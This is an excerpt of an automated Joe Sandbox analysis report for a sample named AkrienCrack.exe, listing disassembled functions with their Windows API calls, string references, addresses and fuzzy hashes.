              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorLast$_free
              • String ID:
              • API String ID: 3170660625-0
              • Opcode ID: 82d66ceccfd7b88b416b8bad94a9c9780c031745f61a79fbe3811f88b819ce7b
              • Instruction ID: 9e39bebb792ef52b28e28b7dbf264b647928f1362a8f238d51594283a083e6c4
              • Opcode Fuzzy Hash: 82d66ceccfd7b88b416b8bad94a9c9780c031745f61a79fbe3811f88b819ce7b
              • Instruction Fuzzy Hash: 0C012836505B006B933267746CC5A2B26DEDFC177172001E5F619E3252EF7CCC016160
              APIs
                • Part of subcall function 00B50A41: ResetEvent.KERNEL32(?), ref: 00B50A53
                • Part of subcall function 00B50A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00B50A67
              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00B5078F
              • CloseHandle.KERNEL32(?,?), ref: 00B507A9
              • DeleteCriticalSection.KERNEL32(?), ref: 00B507C2
              • CloseHandle.KERNEL32(?), ref: 00B507CE
              • CloseHandle.KERNEL32(?), ref: 00B507DA
                • Part of subcall function 00B5084E: WaitForSingleObject.KERNEL32(?,000000FF,00B50A78,?), ref: 00B50854
                • Part of subcall function 00B5084E: GetLastError.KERNEL32(?), ref: 00B50860
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
              • String ID:
              • API String ID: 1868215902-0
              • Opcode ID: 3f25996911305b4c113556e9b44ea2c1824b80576bbb4125113a5ea69b8f5df7
              • Instruction ID: 9a67e05baddc2b5c77e7d3221fe768a569e0c40570a7c4509154cdc92d0c9d69
              • Opcode Fuzzy Hash: 3f25996911305b4c113556e9b44ea2c1824b80576bbb4125113a5ea69b8f5df7
              • Instruction Fuzzy Hash: 6C01B571440704EFC721AF69DC84FC6BBE9FB49B11F004599F55E83160CB756A88DBA1
              APIs
              • _free.LIBCMT ref: 00B6BF28
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B6BF3A
              • _free.LIBCMT ref: 00B6BF4C
              • _free.LIBCMT ref: 00B6BF5E
              • _free.LIBCMT ref: 00B6BF70
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 084994833db14665416626c0a06fa3ba8937d62b13f2d67c06cd65ee8d70eeb7
              • Instruction ID: 62e530cc4163fc03dc6a11ac07eb3d76f03314b188e88eacfd0b19ba661d0adb
              • Opcode Fuzzy Hash: 084994833db14665416626c0a06fa3ba8937d62b13f2d67c06cd65ee8d70eeb7
              • Instruction Fuzzy Hash: 29F01232505201AB9630EB68FEC6C1AB3EAFE0471076449D9F01CD7A21CF38FCC08A54
              APIs
              • _free.LIBCMT ref: 00B6807E
                • Part of subcall function 00B684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?), ref: 00B684F4
                • Part of subcall function 00B684DE: GetLastError.KERNEL32(?,?,00B6BFA7,?,00000000,?,00000000,?,00B6BFCE,?,00000007,?,?,00B6C3CB,?,?), ref: 00B68506
              • _free.LIBCMT ref: 00B68090
              • _free.LIBCMT ref: 00B680A3
              • _free.LIBCMT ref: 00B680B4
              • _free.LIBCMT ref: 00B680C5
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 8684422ae5bd6c4ea36892400ae57370bd5a403f072b5b653c93da1bf82a3c80
              • Instruction ID: 21540d9718304119252ba1b493601fb7a6c3c63e0b4c034ba60ccd462e99f4be
              • Opcode Fuzzy Hash: 8684422ae5bd6c4ea36892400ae57370bd5a403f072b5b653c93da1bf82a3c80
              • Instruction Fuzzy Hash: 33F054B58026258BD7916F1DBC834057BA6FB1A720B184F96F414D7B70CF3984919FD1
              APIs
              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\AkrienCrack.exe,00000104), ref: 00B676FD
              • _free.LIBCMT ref: 00B677C8
              • _free.LIBCMT ref: 00B677D2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _free$FileModuleName
              • String ID: C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
              • API String ID: 2506810119-794829201
              • Opcode ID: 6e730799fb657fcdf41f5d28ab329eed21961c6247b16c0276ffd248decbea4d
              • Instruction ID: a37732b80cfbb37bdadabb580387ba5a8d1c22374802987d77cd4bd4df2b29f2
              • Opcode Fuzzy Hash: 6e730799fb657fcdf41f5d28ab329eed21961c6247b16c0276ffd248decbea4d
              • Instruction Fuzzy Hash: 2431AE71A49218AFDB21DF99DC85DAEBBFCEB85714F1441E6E80497210DE784E40CBA1
              APIs
              • __EH_prolog.LIBCMT ref: 00B47579
                • Part of subcall function 00B43B3D: __EH_prolog.LIBCMT ref: 00B43B42
              • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00B47640
                • Part of subcall function 00B47BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B47C04
                • Part of subcall function 00B47BF5: GetLastError.KERNEL32 ref: 00B47C4A
                • Part of subcall function 00B47BF5: CloseHandle.KERNEL32(?), ref: 00B47C59
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
              • String ID: SeRestorePrivilege$SeSecurityPrivilege
              • API String ID: 3813983858-639343689
              • Opcode ID: 6a1c4bf469d74b33bb6624686cf8c202c2d334aa4d2f1e0e55ecba64e0796b66
              • Instruction ID: e1ec1254f8469879e3d47e0d31c6c7d827dabc9a1930a227bb04d7e7b9aa07dd
              • Opcode Fuzzy Hash: 6a1c4bf469d74b33bb6624686cf8c202c2d334aa4d2f1e0e55ecba64e0796b66
              • Instruction Fuzzy Hash: 01318F71948248AEDF20EB68DC01BEE7BE9EF15754F0040D9F849A7192DF708B48DBA1
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5A4B8
              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00B5A4CD
              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00B5A4E2
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: ASKNEXTVOL
              • API String ID: 445417207-3402441367
              • Opcode ID: 953a48096d061ef25de35b463c3982178ff4a392f1f644b19afdc3fa237e1c2e
              • Instruction ID: 4599fa44fc0163a812c80c01ef392a08e06d5d4a61d90570aadf6b7c6699a6c6
              • Opcode Fuzzy Hash: 953a48096d061ef25de35b463c3982178ff4a392f1f644b19afdc3fa237e1c2e
              • Instruction Fuzzy Hash: B11196326442007FDA219F98DC4AF667BE9EB4B702F1046D4FB41B72A0CBA19949D727
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: __fprintf_l_strncpy
              • String ID: $%s$@%s
              • API String ID: 1857242416-834177443
              • Opcode ID: f1795afde4c0a427d67f0a5b50fec1d7dc01f95b4f5a4ea0964ab49b82b50908
              • Instruction ID: d40b80312337e452bafda66d73dff63439bcae813e159425a50f1ab13a944826
              • Opcode Fuzzy Hash: f1795afde4c0a427d67f0a5b50fec1d7dc01f95b4f5a4ea0964ab49b82b50908
              • Instruction Fuzzy Hash: 1E216372540208ABDF21DEA4CC46FEE7BE8EF04700F0445A2FE15961A1E3B1EB59EB51
              APIs
                • Part of subcall function 00B4130B: GetDlgItem.USER32(00000000,00003021), ref: 00B4134F
                • Part of subcall function 00B4130B: SetWindowTextW.USER32(00000000,00B735B4), ref: 00B41365
              • EndDialog.USER32(?,00000001), ref: 00B5A9DE
              • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00B5A9F6
              • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B5AA24
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ItemText$DialogWindow
              • String ID: GETPASSWORD1
              • API String ID: 445417207-3292211884
              • Opcode ID: d67786fa2321713559657cc01dd3f314a3acd1e6f6b7906b040bb91b65e65881
              • Instruction ID: 3274c164f8c21f5cf658f608fb7919e7da4d4554551ec9a2aa2a4fdc57a62d5c
              • Opcode Fuzzy Hash: d67786fa2321713559657cc01dd3f314a3acd1e6f6b7906b040bb91b65e65881
              • Instruction Fuzzy Hash: F51108329401287ADB219F689D49FFB3BECEB4A712F0001E1FE45B7091C6619E59D672
              APIs
              • _swprintf.LIBCMT ref: 00B4B51E
                • Part of subcall function 00B4400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B4401D
              • _wcschr.LIBVCRUNTIME ref: 00B4B53C
              • _wcschr.LIBVCRUNTIME ref: 00B4B54C
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: _wcschr$__vswprintf_c_l_swprintf
              • String ID: %c:\
              • API String ID: 525462905-3142399695
              • Opcode ID: 6ce5f1931e181b01c759cfdd15c398409e38e0c2640bcec354d23c9ddda64ee9
              • Instruction ID: f117397674981966e99005aa7fe2838bbbfbfc7528709155a5771c684739aae9
              • Opcode Fuzzy Hash: 6ce5f1931e181b01c759cfdd15c398409e38e0c2640bcec354d23c9ddda64ee9
              • Instruction Fuzzy Hash: 3001215350431176C7309B759C92D2BF7ECDEB5760B544856FA45C7041FB34D650D2A2
              APIs
              • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B4ABC5,00000008,?,00000000,?,00B4CB88,?,00000000), ref: 00B506F3
              • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B4ABC5,00000008,?,00000000,?,00B4CB88,?,00000000), ref: 00B506FD
              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B4ABC5,00000008,?,00000000,?,00B4CB88,?,00000000), ref: 00B5070D
              Strings
              • Thread pool initialization failed., xrefs: 00B50725
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: Create$CriticalEventInitializeSectionSemaphore
              • String ID: Thread pool initialization failed.
              • API String ID: 3340455307-2182114853
              • Opcode ID: befee7f7ae136a6edaf7fa333fdf026b357c031348350fe8731168dce1ed3ade
              • Instruction ID: f3cc6f72327a41ce3d64cd54cc9181c44a31b26f459eaf4497c9bc33a6af997b
              • Opcode Fuzzy Hash: befee7f7ae136a6edaf7fa333fdf026b357c031348350fe8731168dce1ed3ade
              • Instruction Fuzzy Hash: 2111A0B1540709AFC3206F66C884AA7FBECEB99745F10486EF1DA83200DA716A84CB50
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID:
              • String ID: RENAMEDLG$REPLACEFILEDLG
              • API String ID: 0-56093855
              • Opcode ID: 2c8c35f01211cc4a3e1d82bf04d452e436e9db65ba07447b4a75ab3218fc45b0
              • Instruction ID: 7780334316edfc27cfdc327d39bb4864ed733d84c467feda435bc9466047d22b
              • Opcode Fuzzy Hash: 2c8c35f01211cc4a3e1d82bf04d452e436e9db65ba07447b4a75ab3218fc45b0
              • Instruction Fuzzy Hash: DA017C72A00246AFDB219F59ED45F563BEAE709382B0445E1FD0993330CF719858EBA1
              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: __alldvrm$_strrchr
              • String ID:
              • API String ID: 1036877536-0
              • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction ID: 970cdf4e9fdc65b76f9756a62f8fbc5b26d4ede41d3403a025e6ee26e8a24d1f
              • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
              • Instruction Fuzzy Hash: 8EA16672A003869FEB25CF68C8917BEBBE9EF55310F1841EDE8959B381C63C8942C754
              APIs
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00B480B7,?,?,?), ref: 00B4A351
              • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00B480B7,?,?), ref: 00B4A395
              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00B480B7,?,?,?,?,?,?,?,?), ref: 00B4A416
              • CloseHandle.KERNEL32(?,?,00000000,?,00B480B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00B4A41D
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: File$Create$CloseHandleTime
              • String ID:
              • API String ID: 2287278272-0
              • Opcode ID: f16f90379cf39ee6ab6a0623f2be86d757a3604236debf661a05c408bfb45bea
              • Instruction ID: 9f0a962bfffef5555c7f5496519b4e2fefbe1169ba71c5ab9285e4ce6ee90f3f
              • Opcode Fuzzy Hash: f16f90379cf39ee6ab6a0623f2be86d757a3604236debf661a05c408bfb45bea
              • Instruction Fuzzy Hash: 4B41AD71288381AAE731EF24DC55BAEBBE8AB85700F04099DF5D493181D6A49B4CEB53
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00B689AD,?,00000000,?,00000001,?,?,00000001,00B689AD,?), ref: 00B6C0E6
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B6C16F
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00B667E2,?), ref: 00B6C181
              • __freea.LIBCMT ref: 00B6C18A
                • Part of subcall function 00B68518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00B6C13D,00000000,?,00B667E2,?,00000008,?,00B689AD,?,?,?), ref: 00B6854A
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
              • String ID:
              • API String ID: 2652629310-0
              • Opcode ID: 41b5d2af39211fd90273a54635a7ffb7248ab2498837420b4ef674a838e745a9
              • Instruction ID: f44c13250d144d716580c7d0212b758cbc865e3281919e9951324a785b1dc4ac
              • Opcode Fuzzy Hash: 41b5d2af39211fd90273a54635a7ffb7248ab2498837420b4ef674a838e745a9
              • Instruction Fuzzy Hash: 7931CD72A0121AABDB258F64CC81EBE7BE5EB45710F0441A8FC19E7251EB39CD50CBA0
              APIs
              • ___BuildCatchObject.LIBVCRUNTIME ref: 00B6251A
                • Part of subcall function 00B62B52: ___AdjustPointer.LIBCMT ref: 00B62B9C
              • _UnwindNestedFrames.LIBCMT ref: 00B62531
              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00B62543
              • CallCatchBlock.LIBVCRUNTIME ref: 00B62567
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B84000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000BA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777322609.0000000000BA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_5_2_b40000_AkrienCrack.jbxd
              Similarity
              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
              • String ID:
              • API String ID: 2633735394-0
              • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction ID: d8810a1c5fa6cd4efb43fd1a0616bc04838f5d0a5945a07254dda37d6ddb17fd
              • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
              • Instruction Fuzzy Hash: 5E012932000509BBDF229F65CC41EDA7BFAFF58710F0580A4FD1966120C33AE961EBA1
              APIs
              • GetDC.USER32(00000000), ref: 00B59DBE
              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B59DCD
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B59DDB
              • ReleaseDC.USER32(00000000,00000000), ref: 00B59DE9
              Memory Dump Source
              • Source File: 00000005.00000002.1777100235.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
              • Associated: 00000005.00000002.1777085488.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777158676.0000000000B73000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 00000005.00000002.1777179455.0000000000B7E000.00000004.00000001.01000000.0000000B.sdmpDownload File
